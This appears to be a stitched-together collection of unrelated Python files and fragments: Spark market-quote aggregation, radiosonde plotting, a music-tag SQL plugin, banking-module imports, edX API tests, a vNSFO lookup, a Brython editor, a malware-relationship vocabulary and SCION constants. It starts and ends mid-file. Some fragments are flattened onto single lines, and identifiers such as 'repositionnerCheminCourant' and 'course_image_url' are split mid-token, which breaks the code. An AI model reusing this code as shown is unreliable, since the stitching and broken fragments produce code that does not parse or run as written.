                baEx = askList.index(minask)  # exchange showing min ask
                bbSize = bidSize[bbEx]
                baSize = askSize[baEx]
                bbExCnt[bbEx] += 1
                baExCnt[baEx] += 1
                bbExSize[bbEx] += bbSize
                # BUG FIX: the best-ask size used to be accumulated at the
                # best-BID exchange's index (baExSize[bbEx] += baSize).
                baExSize[baEx] += baSize
            # BUG FIX: advance the clock even while the book is still empty,
            # so a second quote inside the same millisecond can never
            # trigger a second (mid-millisecond) snapshot.
            currtime = int(list1[i][1])

        # Set the latest bid/ask; back a side out of the book when its
        # price is 0 or the quote is a cancel ('B').
        if (list1[i][2] != 0) and (list1[i][3] != 0):
            bidList[exchangeList.index(list1[i][6])] = list1[i][2]
            bidSize[exchangeList.index(list1[i][6])] = list1[i][3]
        elif (list1[i][2] == 0) or (list1[i][8] == 'B'):
            bidList[exchangeList.index(list1[i][6])] = 0
            bidSize[exchangeList.index(list1[i][6])] = 0
        if (list1[i][4] != 0) and (list1[i][5] != 0):
            askList[exchangeList.index(list1[i][7])] = list1[i][4]
            askSize[exchangeList.index(list1[i][7])] = list1[i][5]
        elif (list1[i][4] == 0) or (list1[i][8] == 'B'):
            askList[exchangeList.index(list1[i][7])] = sys.maxsize
            askSize[exchangeList.index(list1[i][7])] = 0

    # NOTE(review): the final millisecond's NBBO is never counted (no flush
    # after the loop); kept as-is to preserve the existing output format.
    # Convert the accumulated sizes into per-exchange averages.
    for j in range(len(exchangeList)):
        if bbExCnt[j] > 0:
            bbExSize[j] = bbExSize[j] / bbExCnt[j]
        if baExCnt[j] > 0:
            baExSize[j] = baExSize[j] / baExCnt[j]

    nbboList.append((record[0], (bbExCnt, bbExSize, baExCnt, baExSize)))
    return nbboList


if __name__ == "__main__":
    # PySpark is only needed when running as a Spark job; importing it here
    # keeps `processquote` importable (and unit-testable) without Spark.
    from pyspark import SparkContext, SparkConf

    conf = SparkConf().setAppName("nbbo_hfalert")
    sc = SparkContext(conf=conf)
    data1 = sc.textFile(inputDir)
    data2 = data1.zipWithIndex()
    data3 = data2.map(lambda rec: (rec[0][10:26].strip(),
                                   (rec[1],                        # index
                                    rec[0][0:9],                   # ms time
                                    float(rec[0][26:37]) / 10000,  # bid price
                                    int(rec[0][37:44]),            # bid size
                                    float(rec[0][44:55]) / 10000,  # ask price
                                    int(rec[0][55:62]),            # ask size
                                    rec[0][67],                    # bid exchange
                                    rec[0][68],                    # ask exchange
                                    rec[0][87]))).groupByKey()     # cancel or correction
    result = data3.flatMap(lambda records: processquote(records)) \
                  .map(lambda rec: [rec[0], rec[1][0], rec[1][1],
                                    rec[1][2], rec[1][3]])
    result.saveAsTextFile(outputDir)
unctions.py') from TephigramPlot import * from SoundingRoutines import * imp.load_source('GeogFuncs', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/GeogFunctions.py') from GeogFuncs import * pmin=200. station_list_cs=[42182, 43003, 43014, 42867, 43371, 43353, 43285, 43192, 43150, 42339, 40990, 40948] #station_list_cs=[43003] date_min=datetime.datetime(1960,5,1,0,0,0) date_max=datetime.datetime(2014,10,1,0,0,0) delta = relativedelta(weeks=+1) variable_list={'pressures': 0, 'temps':1, 'dewpoints':2, 'winddirs':3, 'windspeeds':4, 'pot_temp':5, 'sat_vap_pres':6, 'vap_press':7, 'rel_hum':8, 'wvmr':9, 'sp_hum':10, 'sat_temp':11, 'theta_e':12, 'theta_e_sat':13, 'theta_e_minus_theta_e_sat':14} variable_list_line={'lcl_temp': 0, 'lcl_vpt':1, 'pbl_pressure':2, 'surface_pressure':3, 'T_eq_0':4} def variable_name_index_match(variable, variable_list): for key, value in variable_list.iteritems(): # iter on both keys and values if key.startswith('%s' % variable) and key.endswith('%s' % variable): arr_index_var=value return arr_index_var
# Parse the data for stat in station_list_cs: station_name,la,lo, st_height=StationInfoSearch(stat) load_file = load('/nfs/a90/eepdw/Data/Observations/Radiosonde_Numpy/Radiosonde_Cross_Section_' 'IND_SOUNDING_INTERP_MEAN_Climat_%s_%s_%s_%s.npz'
% (date_min.strftime('%Y%m%d'), date_max.strftime('%Y%m%d'), delta, stat)) data=load_file['date_bin_mean_all_dates_one_station'] dates=load_file['dates_for_plotting'] for bin in range(data.shape[0]): try: p=data[bin,0,:]/100 T=data[bin,1,:]-273.15 Td=T-data[bin,2,:] h=data[bin,15,:] da=dates[bin] #print T #print p #print Td #pdb.set_trace() #u_wind,v_wind = u_v_winds(data[bin,3,:], data[bin,4,:]) u_wind,v_wind = data[bin,-2,:], data[bin,-1,:] # Create a new figure. The dimensions here give a good aspect ratio fig = plt.figure(figsize=(10, 8), frameon=False) #fig.patch.set_visible(False) tephigram_plot_height=0.85 tephigram_plot_bottom=.085 ax = fig.add_axes([.085,tephigram_plot_bottom,.65,tephigram_plot_height], projection='skewx', frameon=False, axisbg='w') ax.set_yscale('log') plt.grid(True) #pdb.set_trace() tmax=math.ceil(nanmax(T)/10)*10 tmin=math.floor(nanmin(Td[p>400])/10)*10 pmax=math.ceil(nanmax(p)/50)*50 P=linspace(pmax,pmin,37) w = array([0.0001,0.0004,0.001, 0.002, 0.004, 0.007, 0.01, 0.016, 0.024, 0.032, 0.064, 0.128]) ax.add_mixratio_isopleths(w,linspace(pmax, 700., 37),color='m',ls='-',alpha=.5,lw=0.5) ax.add_dry_adiabats(linspace(-40,40,9),P,color='k',ls='-',alpha=.5,lw=0.8) ax.add_moist_adiabats(linspace(-40,40,18),P,color='k',ls='--',alpha=.5,lw=0.8, do_labels=False) ax.other_housekeeping(pmax, pmin, 40,-40) wbax = fig.add_axes([0.75,tephigram_plot_bottom,0.12,tephigram_plot_height],frameon=False, sharey=ax, label='barbs') ax_text_box = fig.add_axes([0.85,0.085,.12,tephigram_plot_height], frameon=False, axisbg='w') # Plot the data using normal plotting functions, in this case using semilogy ax.semilogy(T, p, 'r', linewidth=2) ax.semilogy(Td, p, 'r',linewidth=2) # row_labels=( # 'SLAT', # 'SLON', # 'SELV', # 'SHOW', # 'LIFT', # 'LFTV', # 'SWET', # 'KINX', # 'CTOT', # 'VTOT', # 'TOTL', # 'CAPE', # 'CINS', # 'CAPV', # 'CINV', # 'LFCT', # 'LFCV', # 'BRCH', # 'BRCV', # 'LCLT', # 'LCLP', # 'MLTH', # 'MLMR', # 'THCK', # 'PWAT') # variable='pbl_pressure' # 
var_index = variable_name_index_match(variable, variable_list_line) # print load_file['date_bin_mean_all_dates_one_station_single'].shape # pbl_pressure = load_file['date_bin_mean_all_dates_one_station_single'][bin,0,var_index] # print pbl_pressure # EQLV, pp, lclp,lfcp, lclt, delta_z, CAPE, CIN=CapeCinPBLInput(p, T, Td, h, st_height, pbl_pressure/100) # print lclp # table_vals=( # #'%s' % station_name, # #'Climatology - Week beg. %s' % da, # '%s' % la, # '%s' % lo, # '%s' % st_height, # '%.1f' % ShowalterIndex(T, Td, p), # ['Showalter index', # '%.1f' % LiftedIndex(T, Td, p, h, st_height), # 'Lifted index', # '--', # 'LIFT computed using virtual temperature', # '--', # 'SWEAT index', # '%.1f' % KIndex(T, Td, p), # 'K index', # '%.1f' % CrossTotalsIndex(T, Td, p), # 'Cross totals index', # '%.1f' % VerticalTotalsIndex(T, p), # 'Vertical totals index', # '%.1f' % TotalTotalsIndex(T, Td, p), # 'Total totals index', # '%.1f' % CAPE, # 'CAPE', # '%.1f' % CIN, # 'CIN', # '--', # 'CAPE using virtual temperature', # '--', # 'CINS using virtual temperature', # '%.1f' % lfcp, # 'Level of free convection', # '--', # 'LFCT using virtual temperature', # '--' , # 'Bulk Richardson number', # '--', # 'Bulk richardson using CAPV', # '%.1f' % lclt, # 'Temp [K] of the Lifted Condensation Level', # '%.1f' % lclp , # 'Pres [hPa] of the Lifted Condensation Level', # '--', # 'Mean mixed layer potential temperature', # '--', # 'Mean mixed layer mixing ratio', # '--', # '1000 hPa to 500 hPa thickness', # '--') # 'Precipitable water [mm] for entire sounding'] # Wind barbs barbs_idx=np.logspace(np.log10(10),np.log10(max(len(u_wind))),num=32).astype(int) wbax.set_yscale('log') wbax.xaxis.set_ticks([],[]) wbax.yaxis.grid(True,ls='-',color='y',lw=0.5) wbax.set_xlim(-1.5,1.5) wbax.get_yaxis().set_visible(False) wbax.set_ylim(pmax+100,pmin)
from __future__ import absolute_import

from changes.api.base import APIView
from changes.models import Task


class TaskIndexAPIView(APIView):
    """Read-only API endpoint listing all tasks."""

    def get(self):
        """Return the paginated task list, most recently created first."""
        recent_first = Task.query.order_by(Task.date_created.desc())
        return self.paginate(recent_first)
#!/usr/bin/env python
# vi:ai:et:ts=4 sw=4
#
# -*- coding: utf8 -*-
#
# PyMmr My Music Renamer
# Copyright (C) 2007-2010 mathgl67@gmail.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from mmr.plugin import AbstractResearchPlugin
from mmr.album import Album
from mmr.abstract_investigate import AbstractInvestigate


class Freedb(AbstractResearchPlugin):
    """Research plugin backed by a local Freedb MySQL mirror."""

    def setup(self):
        # Register the investigator class and the plugin metadata/priority.
        self.investigate_class = FreedbInvestigate
        self.about = {
            "name": u"Freedb",
            "short_description": u"",
            "long_description": u"",
        }
        self.priority = 5

    def available(self):
        """Return True when the MySQLdb driver can be imported."""
        try:
            import MySQLdb  # availability probe only
        except ImportError:
            return False
        return True


plugin_class = Freedb


class FreedbInvestigate(AbstractInvestigate):
    """Look up album genre and year in the Freedb database."""

    def _set_up_(self):
        # Deferred import: MySQLdb is optional (see Freedb.available).
        import MySQLdb
        self.db = MySQLdb.connect(
            host=self._config_['host'],
            user=self._config_['user'],
            passwd=self._config_['password'],
            db=self._config_['db']
        )
        self.db.set_character_set("utf8")
        self._album_ = Album('freedb', self._base_score_)

    def do_album(self):
        """Fill the freedb album result from the first matching DB rows."""
        for res in self._album_list_:
            if res.artist and res.album:
                artist = res.artist.encode("UTF-8")
                album = res.album.encode("UTF-8")
                # SECURITY FIX: the query used to be built with string
                # interpolation ('... LIKE "%s"' % ...), allowing SQL
                # injection through tag data. Use a parameterized query so
                # the driver quotes/escapes the values.
                cursor = self.db.cursor()
                cursor.execute(
                    "SELECT genre, year FROM album"
                    " WHERE artist LIKE %s AND title LIKE %s",
                    (artist, album)
                )
                for (genre, year) in cursor.fetchall():
                    self._album_.artist = res.artist
                    self._album_.album = res.album
                    self._album_.genre = unicode(genre, "UTF-8")
                    self._album_.year = unicode(str(year), "UTF-8")
        return self._album_

    def do_track(self, file_obj, result_array):
        """Per-track lookup is not supported by this plugin."""
        return None
# -*- coding: utf-8 -*- # Copyright(C) 2010-2011 Nicolas Duhamel # # This file is part of a weboob module. # # This weboob module is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This weboob module is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with this weboob module. If not, see <http://www.gnu.org/licenses/>. from .login import ( LoginPage, Initident, CheckPassword, r
epositionnerCheminCourant, BadLoginPage, AccountDesactivate, UnavailablePage, Validated2FAPage, TwoFAPage, SmsPage, DecoupledPage, ) from .accountlist import AccountList, AccountRIB, Advisor, RevolvingAttributesPage from .accounthistory import AccountHistory, CardsList from .transfer import TransferChooseAccounts, CompleteTransfer, TransferConfirm, TransferSummary, CreateRecipient, ValidateRecipient,\
ValidateCountry, ConfirmPage, RcptSummary from .subscription import SubscriptionPage, DownloadPage, ProSubscriptionPage __all__ = ['LoginPage', 'Initident', 'CheckPassword', 'repositionnerCheminCourant', "AccountList", 'AccountHistory', 'BadLoginPage', 'AccountDesactivate', 'TransferChooseAccounts', 'CompleteTransfer', 'TransferConfirm', 'TransferSummary', 'UnavailablePage', 'CardsList', 'AccountRIB', 'Advisor', 'CreateRecipient', 'ValidateRecipient', 'ValidateCountry', 'ConfirmPage', 'RcptSummary', 'SubscriptionPage', 'DownloadPage', 'ProSubscriptionPage', 'RevolvingAttributesPage', 'Validated2FAPage', 'TwoFAPage', 'SmsPage', 'DecoupledPage', ]
rses), 1) found_course = courses[0]['course'] self.assertIn('courses/{}/about'.format(self.course.id), found_course['course_about']) self.assertIn('course_info/{}/updates'.format(self.course.id), found_course['course_updates']) self.assertIn('course_info/{}/handouts'.format(self.course.id), found_course['course_handouts']) self.assertIn('video_outlines/courses/{}'.format(self.course.id), found_course['video_outline']) self.assertEqual(found_course['id'], unicode(self.course.id)) self.assertEqual(courses[0]['mode'], CourseMode.DEFAULT_MODE_SLUG) self.assertEqual(courses[0]['course']['subscription_id'], self.course.clean_id(padding_char='_')) expected_course_image_url = course_image_url(
self.course) self.assertIsNotNone(expected_course_image_url) self.assertIn(expected_course_image_url, found_course['course_image']) self.assertIn(expected_course_ima
ge_url, found_course['media']['course_image']['uri']) def verify_failure(self, response, error_type=None): self.assertEqual(response.status_code, 200) courses = response.data self.assertEqual(len(courses), 0) @patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True}) def test_sort_order(self): self.login() num_courses = 3 courses = [] for course_index in range(num_courses): courses.append(CourseFactory.create(mobile_available=True)) self.enroll(courses[course_index].id) # verify courses are returned in the order of enrollment, with most recently enrolled first. response = self.api_response() for course_index in range(num_courses): self.assertEqual( response.data[course_index]['course']['id'], unicode(courses[num_courses - course_index - 1].id) ) @patch.dict(settings.FEATURES, { 'ENABLE_PREREQUISITE_COURSES': True, 'DISABLE_START_DATES': False, 'ENABLE_MKTG_SITE': True, }) def test_courseware_access(self): self.login() course_with_prereq = CourseFactory.create(start=self.LAST_WEEK, mobile_available=True) prerequisite_course = CourseFactory.create() set_prerequisite_courses(course_with_prereq.id, [unicode(prerequisite_course.id)]) # Create list of courses with various expected courseware_access responses and corresponding expected codes courses = [ course_with_prereq, CourseFactory.create(start=self.NEXT_WEEK, mobile_available=True), CourseFactory.create(visible_to_staff_only=True, mobile_available=True), CourseFactory.create(start=self.LAST_WEEK, mobile_available=True, visible_to_staff_only=False), ] expected_error_codes = [ MilestoneAccessError().error_code, # 'unfulfilled_milestones' StartDateError(self.NEXT_WEEK).error_code, # 'course_not_started' VisibilityError().error_code, # 'not_visible_to_user' None, ] # Enroll in all the courses for course in courses: self.enroll(course.id) # Verify courses have the correct response through error code. 
Last enrolled course is first course in response response = self.api_response() for course_index in range(len(courses)): result = response.data[course_index]['course']['courseware_access'] self.assertEqual(result['error_code'], expected_error_codes[::-1][course_index]) if result['error_code'] is not None: self.assertFalse(result['has_access']) @ddt.data( ('next_week', ADVERTISED_START, ADVERTISED_START, "string"), ('next_week', None, defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"), ('next_week', '', defaultfilters.date(NEXT_WEEK, "DATE_FORMAT"), "timestamp"), ('default_start_date', ADVERTISED_START, ADVERTISED_START, "string"), ('default_start_date', '', None, "empty"), ('default_start_date', None, None, "empty"), ) @ddt.unpack @patch.dict(settings.FEATURES, {'DISABLE_START_DATES': False, 'ENABLE_MKTG_SITE': True}) def test_start_type_and_display(self, start, advertised_start, expected_display, expected_type): """ Tests that the correct start_type and start_display are returned in the case the course has not started """ self.login() course = CourseFactory.create(start=self.DATES[start], advertised_start=advertised_start, mobile_available=True) self.enroll(course.id) response = self.api_response() self.assertEqual(response.data[0]['course']['start_type'], expected_type) self.assertEqual(response.data[0]['course']['start_display'], expected_display) @patch.dict(settings.FEATURES, {"ENABLE_DISCUSSION_SERVICE": True, 'ENABLE_MKTG_SITE': True}) def test_discussion_url(self): self.login_and_enroll() response = self.api_response() response_discussion_url = response.data[0]['course']['discussion_url'] self.assertIn('/api/discussion/v1/courses/{}'.format(self.course.id), response_discussion_url) def test_org_query(self): self.login() # Create list of courses with various organizations courses = [ CourseFactory.create(org='edX', mobile_available=True), CourseFactory.create(org='edX', mobile_available=True), CourseFactory.create(org='edX', mobile_available=True, 
visible_to_staff_only=True), CourseFactory.create(org='Proversity.org', mobile_available=True), CourseFactory.create(org='MITx', mobile_available=True), CourseFactory.create(org='HarvardX', mobile_available=True), ] # Enroll in all the courses for course in courses: self.enroll(course.id) response = self.api_response(data={'org': 'edX'}) # Test for 3 expected courses self.assertEqual(len(response.data), 3) # Verify only edX courses are returned for entry in response.data: self.assertEqual(entry['course']['org'], 'edX') @attr(shard=9) @override_settings(MKTG_URLS={'ROOT': 'dummy-root'}) class TestUserEnrollmentCertificates(UrlResetMixin, MobileAPITestCase, MilestonesTestCaseMixin): """ Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/ """ REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']} ENABLED_SIGNALS = ['course_published'] def verify_pdf_certificate(self): """ Verifies the correct URL is returned in the response for PDF certificates. """ self.login_and_enroll() certificate_url = "http://test_certificate_url" GeneratedCertificateFactory.create( user=self.user, course_id=self.course.id, status=CertificateStatuses.downloadable, mode='verified', download_url=certificate_url, ) response = self.api_response() certificate_data = response.data[0]['certificate'] self.assertEquals(certificate_data['url'], certificate_url) @patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True}) def test_no_certificate(self): self.login_and_enroll() response = self.api_response() certificate_data = response.data[0]['certificate'] self.assertDictEqual(certificate_data, {}) @patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': False, 'ENABLE_MKTG_SITE': True}) def test_pdf_certificate_with_html_cert_disabled(self): """ Tests PDF certificates with CERTIFICATES_HTML_VIEW set to True. 
""" self.verify_pdf_certificate() @patch.dict(settings.FEATURES, {'CERTIFICATES_HTML_VIEW': True, 'ENABLE_MKTG_SITE': True}) def test_pdf_certificate_with_html_cert_enabled(self): """ Tests PDF certificates with CERTIFICATES_HTML_VIEW set to True. """ self.verify_pdf_certificate() @patch.dict(settings.FEATURES, {'CERTIFICATES_HTM
# Copyright 2018 Politecnico di Torino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import requests

from cybertop.log import LOG


def retrieve_vnsfr_id(vnsfo_base_url, vnfd_id, attack_name, timeout):
    """Look up the vNSF record id of a running instance via the vNSFO API.

    Queries ``<vnsfo_base_url>/vnsf/r4/running`` and returns the
    ``vnfr_id`` of the first running vNSF whose descriptor id matches
    both ``vnfd_id`` and ``attack_name`` (case-insensitive substring
    match). Returns ``None`` when no instance matches or when the API
    call fails for any reason.

    :param vnsfo_base_url: base URL of the vNSFO REST API.
    :param vnfd_id: vNSF descriptor id to match against.
    :param attack_name: attack type name to match against.
    :param timeout: request timeout in seconds, passed to ``requests.get``.
    :returns: the matching ``vnfr_id`` string, or ``None``.
    """
    LOG.info("Request vNSFO API call for vnsfd_id=" + vnfd_id + " and attack type=" + attack_name)
    url = vnsfo_base_url + "/vnsf/r4/running"
    LOG.info("VNSFO API call: " + url)
    try:
        # NOTE(review): verify=False disables TLS certificate validation —
        # presumably the vNSFO uses a self-signed cert; confirm this is intended.
        response = requests.get(url, verify=False, timeout=timeout)
        LOG.info("VNSFO API response: " + response.text)
        vnsfs = response.json()["vnsf"]
        # search for first running instance which matches the query
        for vnsf in vnsfs:
            # [:-5] strips a trailing suffix from the descriptor id before
            # comparing — assumes a fixed 5-char suffix (e.g. a version tag);
            # TODO confirm against the vNSFO naming scheme.
            target_vnf = vnsf['vnfd_id'][:-5].lower()
            if vnfd_id[:-5].lower() in target_vnf and attack_name.lower() in target_vnf:
                LOG.info("Found instance=" + vnsf['vnfr_id'] + " for attack=" + attack_name)
                return vnsf['vnfr_id']
        LOG.info("No running instance found from VNSFO API.")
        return None
    except Exception as e:
        # Any failure (network, JSON shape, missing keys) is logged and
        # reported as "not found" rather than propagated to the caller.
        LOG.critical("VNSFO API error: " + str(e))
        return None
"""Fit and plot a linear regression of body weight on brain weight.

Reads the fixed-width dataset ``brain_body.txt`` (columns ``Brain`` and
``Body``), fits a one-variable linear model, and shows a scatter plot of
the data with the fitted regression line overlaid.
"""
import pandas as pd
from sklearn import linear_model
import matplotlib.pyplot as plt

# Load the dataset; keep features/targets as single-column DataFrames,
# which is the 2-D shape scikit-learn expects for X.
dataframe = pd.read_fwf('brain_body.txt')
features = dataframe[['Brain']]
targets = dataframe[['Body']]

# Fit an ordinary least-squares model: Body ~ Brain.
model = linear_model.LinearRegression()
model.fit(features, targets)

# Plot the raw points and the fitted line on the same axes.
plt.scatter(features, targets)
plt.plot(features, model.predict(features))
plt.show()
"""Brython-based in-browser Python editor with a run console.

Wires an Ace editor (with a plain <textarea> fallback) to a console
<textarea>, persists the source in localStorage, and executes the code
with ``exec`` when the Run button is clicked.
"""
import sys
import time
import traceback

import javascript

from browser import document as doc, window, alert

has_ace = True
try:
    # Preferred path: attach to an Ace editor instance on the page.
    editor = window.ace.edit("editor")
    session = editor.getSession()
    session.setMode("ace/mode/python")
    editor.setOptions({
     'enableLiveAutocompletion': True,
     'enableSnippets': True,
     'highlightActiveLine': False,
     'highlightSelectedWord': True,
     'autoScrollEditorIntoView': True,
     # 'maxLines': session.getLength() -- could size the editor to the
     # program length instead of a fixed number of rows.
     'maxLines': 20
    })
except:
    # Fallback: Ace is unavailable, so emulate its getValue/setValue API
    # on a plain textarea so the rest of the code is editor-agnostic.
    from browser import html
    editor = html.TEXTAREA(rows=20, cols=70)
    doc["editor"] <= editor
    def get_value(): return editor.value
    def set_value(x):editor.value = x
    editor.getValue = get_value
    editor.setValue = set_value
    has_ace = False

# localStorage is used (when present) to persist the last-run source.
if hasattr(window, 'localStorage'):
    from browser.local_storage import storage
else:
    storage = None

def reset_src():
    """Restore the Ace editor content from storage or a default snippet."""
    if storage is not None and "py_src" in storage:
        editor.setValue(storage["py_src"])
    else:
        editor.setValue('for i in range(10):\n\tprint(i)')
    editor.scrollToRow(0)
    editor.gotoLine(0)

def reset_src_area():
    """Restore the fallback textarea content from storage or a default."""
    if storage and "py_src" in storage:
        editor.value = storage["py_src"]
    else:
        editor.value = 'for i in range(10):\n\tprint(i)'

class cOutput:
    """File-like object that appends writes to a page element's value."""

    def __init__(self,target):
        self.target = doc[target]

    def write(self,data):
        self.target.value += str(data)

#if "console" in doc:
# Redirect stdout/stderr to the on-page console textarea.
sys.stdout = cOutput("console")
sys.stderr = cOutput("console")

def to_str(xx):
    return str(xx)

info = sys.implementation.version
doc['version'].text = 'Brython %s.%s.%s' % (info.major, info.minor, info.micro)

# Console text captured after the last run; re-shown by show_console().
output = ''

def show_console(ev):
    """Display the captured output of the last run in the console."""
    doc["console"].value = output
    doc["console"].cols = 60
    doc["console"].rows = 10

# load a Python script
def load_script(evt):
    # Cache-busting query string forces a fresh fetch of the script.
    _name = evt.target.value + '?foo=%s' % time.time()
    editor.setValue(open(_name).read())

# run a script, in global namespace if in_globals is True
def run(*args):
    """Execute the editor content; return 1 on success, 0 on exception."""
    global output
    doc["console"].value = ''
    src = editor.getValue()
    if storage is not None:
        # Persist the source so it survives a page reload.
        storage["py_src"] = src

    t0 = time.perf_counter()
    try:
        #ns = {'__name__':'__main__'}
        ns = {'__name__':'editor'}
        exec(src, ns)
        state = 1
    except Exception as exc:
        # Show the traceback in the console (stderr is redirected there).
        traceback.print_exc(file=sys.stderr)
        state = 0
    output = doc["console"].value

    print('<completed in %6.2f ms>' % ((time.perf_counter() - t0) * 1000.0))
    return state

if has_ace:
    reset_src()
else:
    reset_src_area()

def clear_console(ev):
    doc["console"].value = ""

doc['run'].bind('click',run)
doc['show_console'].bind('click',show_console)
doc['clear_console'].bind('click',clear_console)
from crits.vocabulary.vocab import vocab


class RelationshipTypes(vocab):
    """
    Vocabulary for Relationship Types.
    """

    COMPRESSED_FROM = "Compressed From"
    COMPRESSED_INTO = "Compressed Into"
    CONNECTED_FROM = "Connected From"
    CONNECTED_TO = "Connected To"
    CONTAINS = "Contains"
    CONTAINED_WITHIN = "Contained Within"
    CREATED = "Created"
    CREATED_BY = "Created By"
    DECODED = "Decoded"
    DECODED_BY = "Decoded By"
    DECRYPTED = "Decrypted"
    DECRYPTED_BY = "Decrypted By"
    DOWNLOADED = "Downloaded"
    DOWNLOADED_BY = "Downloaded By"
    DOWNLOADED_FROM = "Downloaded From"
    DOWNLOADED_TO = "Downloaded To"
    DROPPED = "Dropped"
    DROPPED_BY = "Dropped By"
    INSTALLED = "Installed"
    INSTALLED_BY = "Installed By"
    LOADED_FROM = "Loaded From"
    LOADED_INTO = "Loaded Into"
    PACKED_FROM = "Packed From"
    PACKED_INTO = "Packed Into"
    RECEIVED_FROM = "Received From"
    SENT_TO = "Sent To"
    REGISTERED = "Registered"
    REGISTERED_TO = "Registered To"
    RELATED_TO = "Related To"
    RESOLVED_TO = "Resolved To"
    SENT = "Sent"
    SENT_BY = "Sent By"
    SUB_DOMAIN_OF = "Sub-domain Of"
    SUPRA_DOMAIN_OF = "Supra-domain Of"

    @classmethod
    def inverse(cls, relationship=None):
        """
        Return the inverse relationship of the provided relationship.

        Replaces the previous 40-branch if/elif chain with a table of
        inverse pairs: each pair maps both ways, self-inverse types map
        to themselves, and anything unknown (or None) yields None.

        :param relationship: The relationship to get the inverse of.
        :type relationship: str
        :returns: str or None
        """
        if relationship is None:
            return None
        # Each tuple (a, b) means a <-> b are inverses of each other.
        pairs = (
            (cls.COMPRESSED_FROM, cls.COMPRESSED_INTO),
            (cls.CONNECTED_FROM, cls.CONNECTED_TO),
            (cls.CONTAINS, cls.CONTAINED_WITHIN),
            (cls.CREATED, cls.CREATED_BY),
            (cls.DECODED, cls.DECODED_BY),
            (cls.DECRYPTED, cls.DECRYPTED_BY),
            (cls.DOWNLOADED, cls.DOWNLOADED_BY),
            (cls.DOWNLOADED_FROM, cls.DOWNLOADED_TO),
            (cls.DROPPED, cls.DROPPED_BY),
            (cls.INSTALLED, cls.INSTALLED_BY),
            (cls.LOADED_FROM, cls.LOADED_INTO),
            (cls.PACKED_FROM, cls.PACKED_INTO),
            (cls.RECEIVED_FROM, cls.SENT_TO),
            (cls.REGISTERED, cls.REGISTERED_TO),
            (cls.SENT, cls.SENT_BY),
            (cls.SUB_DOMAIN_OF, cls.SUPRA_DOMAIN_OF),
        )
        mapping = {}
        for a, b in pairs:
            mapping[a] = b
            mapping[b] = a
        # Self-inverse relationship types.
        mapping[cls.RELATED_TO] = cls.RELATED_TO
        mapping[cls.RESOLVED_TO] = cls.RESOLVED_TO
        # Unknown relationships return None, matching the old else branch.
        return mapping.get(relationship)
from .Base_Action import *


class ProfileAction(Base_Action):
    """Scheme 'Profile' action parsed from an Xcode scheme XML node.

    Exposes the profile-action attributes of the scheme as plain
    instance attributes; each is whatever string the XML carried, or
    None when the attribute is absent.
    """

    def __init__(self, action_xml, root_action=None):
        # Bug fix: super(self.__class__, self) recurses infinitely as soon
        # as a subclass inherits this __init__ (self.__class__ is then the
        # subclass, so the "parent" lookup finds ProfileAction again).
        # Name the class explicitly, as Python 2-compatible code must.
        super(ProfileAction, self).__init__(action_xml, root_action)

        # Attribute values come from the parsed XML contents dict built by
        # Base_Action; .get() yields None for attributes not present.
        self.shouldUseLaunchSchemeArgsEnv = self.contents.get('shouldUseLaunchSchemeArgsEnv')
        self.savedToolIdentifier = self.contents.get('savedToolIdentifier')
        self.useCustomWorkingDirectory = self.contents.get('useCustomWorkingDirectory')
        self.buildConfiguration = self.contents.get('buildConfiguration')
        self.debugDocumentVersioning = self.contents.get('debugDocumentVersioning')
# Copyright 2015 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`defines` --- Constants
============================

Contains constant definitions used throughout the codebase.
"""
# Stdlib
import os

#: SCION protocol version
SCION_PROTO_VERSION = 0

#: Max TTL of a PathSegment in realtime seconds.
# TODO(shitz): This value should be externally configurable. The problem is that
# the revocation hash tree TTL needs to be at least as large as MAX_SEGMENT_TTL,
# but having a TTL of 1 day makes the hash tree generation costly enough that it
# times out on CircleCI. Thus, we should have one external config file for the
# Docker/CircleCI environment and one for production.
MAX_SEGMENT_TTL = 30 * 60
#: Time unit for HOF expiration.
EXP_TIME_UNIT = MAX_SEGMENT_TTL // 256
#: Max number of supported HopByHop extensions (does not include SCMP)
MAX_HOPBYHOP_EXT = 3
#: Number of bytes per 'line'. Used for padding in many places.
LINE_LEN = 8

#: Generated files directory
GEN_PATH = 'gen'
#: Topology configuration
TOPO_FILE = "topology.yml"
#: AS configuration
AS_CONF_FILE = "as.yml"
#: Path policy config
PATH_POLICY_FILE = "path_policy.yml"
#: Networks config
NETWORKS_FILE = "networks.conf"
#: IFIDs list
IFIDS_FILE = "ifids.yml"
#: AS list
AS_LIST_FILE = "as_list.yml"

#: Buffer size for receiving packets
SCION_BUFLEN = 65535
#: Default SCION endhost data port
SCION_UDP_EH_DATA_PORT = 30041
